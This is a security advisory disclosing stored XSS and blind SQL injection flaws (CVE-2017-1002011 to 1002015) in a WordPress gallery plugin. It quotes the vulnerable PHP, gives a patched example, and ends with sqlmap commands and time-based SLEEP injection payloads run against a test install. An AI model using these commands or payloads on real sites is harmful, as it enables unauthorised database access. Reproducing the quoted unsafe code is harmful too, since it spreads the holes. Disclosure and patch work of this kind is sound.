Title: Blind SQL Injection and persistent XSS in WordPress plugin image-gallery-with-slideshow v1.5.2
CVE-2017-1002011:

There is a stored XSS vulnerability via $value->gallery_name and $value->gallery_description: anyone with privileges to add or modify galleries / images can store JavaScript in the database, and it is echoed back into the page without escaping.

145 <?php echo $value->gallery_name; ?>
146 <?php echo $value->gallery_description; ?>

CVE-2017-1002012:

In image-gallery-with-slideshow/admin_setting.php the following snippets concatenate the gid request parameter directly into SQL statements without sanitizing or parameterizing it:


173 if($_REQUEST['val'] == 'view')
174 {
175         $path_value = get_combo_path_value();
176         $id = $_REQUEST['gid'];
177         global $wpdb;
178         $table_prefix = $wpdb->prefix;
179         $result = $wpdb->get_results("SELECT ig.gallery_name,ii.image_id,ii.original_name,ii.image_name,ii.gallery_id,ii.image_title,ii.link_url,ii.image_description FROM `".$table_prefix."combo_gallery` AS ig,`".$table_prefix."combo_image` AS ii WHERE ig.gallery_id=ii.gallery_id AND ii.gallery_id =".$id);


255 if($_REQUEST['val'] == 'edit')
256 {
257         $id = $_REQUEST['gid'];
258         global $wpdb;
259         $table_prefix = $wpdb->prefix;
.
.
.
270         $edit_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_gallery` WHERE gallery_id = ".$id);

CVE-2017-1002013:
Blind SQL Injection via imgid parameter.

301 if($_REQUEST['val'] == 'imgedit')
302 {
303         $id = $_REQUEST['imgid'];
304         $gid = $_REQUEST['gid'];
305         global $wpdb;
.
.
309         if(isset($_REQUEST['edit_image_submit']))
310         {
.
.
.
318         $edit_img_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id = ".$id);


361 if($_REQUEST['gval'] == 'delete')
362 {
363         $id = $_REQUEST['gid'];
364         global $wpdb;
365         $table_prefix = $wpdb->prefix;
366         $info = $_SERVER['DOCUMENT_ROOT'];
367         $path_value = get_combo_path_value();
368         $select_img_query_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE gallery_id=".$id);


384 if($_REQUEST['ival'] == 'delete')
385 {
386         $path_value = get_combo_path_value();
387         $id = $_REQUEST['gid'];
388         global $wpdb;
389         $table_prefix = $wpdb->prefix;
390         $info = $_SERVER['DOCUMENT_ROOT'];
391         $select_img_query_result1 = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id=".$id);

CVE-2017-1002014:
Blind SQL Injection via gallery_name parameter.

422 if(isset($_POST['gallery_submit']))
423 {
424         $gallery_name = $_REQUEST['gallery_name'];
425         $insert_query_result = $wpdb->insert($table_prefix.'combo_gallery', array('gallery_name' => $gallery_name,'date' => current_time('mysql')));
426 

CVE-2017-1002015:
Blind SQL Injection via selectMulGallery parameter.

492 if(isset($_POST['image_submit']))
493 {
494         $gallery_id = $_POST['selectMulGallery'];
495         $update_gallery_query = "UPDATE `".$table_prefix."combo_image` SET gallery_id=".$gallery_id." WHERE gallery_id = '0'";
496         $wpdb->query($update_gallery_query);
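The common root cause across the SQL issues above is that request values reach $wpdb->get_results() / $wpdb->query() through string concatenation, and the XSS is the same value echoed without output escaping. The following is an added hardening example, not the plugin's own code; it assumes the WordPress runtime ($wpdb, absint(), sanitize_text_field(), esc_html(), wp_die()) and uses hypothetical igws_* function names.

```php
<?php
// Added example (not the plugin's code). Assumes the WordPress runtime:
// $wpdb, absint(), sanitize_text_field(), esc_html(), wp_die(). Function
// names are hypothetical.

// CVE-2017-1002012/13: numeric IDs go through absint() and $wpdb->prepare()
// with %d, so the value can only ever reach MySQL as an integer.
function igws_get_gallery_images( $raw_gid ) {
    global $wpdb;
    $gid = absint( $raw_gid );               // "1 AND SLEEP(5)" becomes 1
    if ( 0 === $gid ) {
        wp_die( 'Invalid gallery id.' );
    }
    $sql = $wpdb->prepare(
        "SELECT ig.gallery_name, ii.image_id, ii.image_name, ii.image_title
           FROM `{$wpdb->prefix}combo_gallery` AS ig
           JOIN `{$wpdb->prefix}combo_image`   AS ii ON ig.gallery_id = ii.gallery_id
          WHERE ii.gallery_id = %d",
        $gid
    );
    return $wpdb->get_results( $sql );
}

// CVE-2017-1002015: same treatment for the UPDATE that files images into a gallery.
function igws_assign_unfiled_images( $raw_gallery_id ) {
    global $wpdb;
    $gallery_id = absint( $raw_gallery_id );
    return $wpdb->query( $wpdb->prepare(
        "UPDATE `{$wpdb->prefix}combo_image` SET gallery_id = %d WHERE gallery_id = 0",
        $gallery_id
    ) );
}

// CVE-2017-1002014: gallery_name stays a string; it is cleaned up and then
// passed as a bound value with an explicit %s format.
function igws_create_gallery( $raw_name ) {
    global $wpdb;
    $name = sanitize_text_field( wp_unslash( $raw_name ) );
    return $wpdb->insert(
        $wpdb->prefix . 'combo_gallery',
        array( 'gallery_name' => $name, 'date' => current_time( 'mysql' ) ),
        array( '%s', '%s' )
    );
}

// CVE-2017-1002011: escape at output time, whatever is stored in the row.
function igws_render_gallery_row( $value ) {
    echo '<td>' . esc_html( $value->gallery_name ) . '</td>';
    echo '<td>' . esc_html( $value->gallery_description ) . '</td>';
}
```

Escaping on output (esc_html) is what closes the stored XSS; input cleanup alone does not, because older rows and other write paths still reach the template.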

Proof of concept (sqlmap output against a test installation, using an authenticated session cookie):

$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=*' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2


Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.169:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=(CASE WHEN (2912=2912) THEN SLEEP(5) ELSE 2912 END)
---
[14:28:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:28:20] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 14:28:20


$ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=*&gid=1' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=(CASE WHEN (4482=4482) THEN SLEEP(5) ELSE 4482 END)&gid=1
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[22:07:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'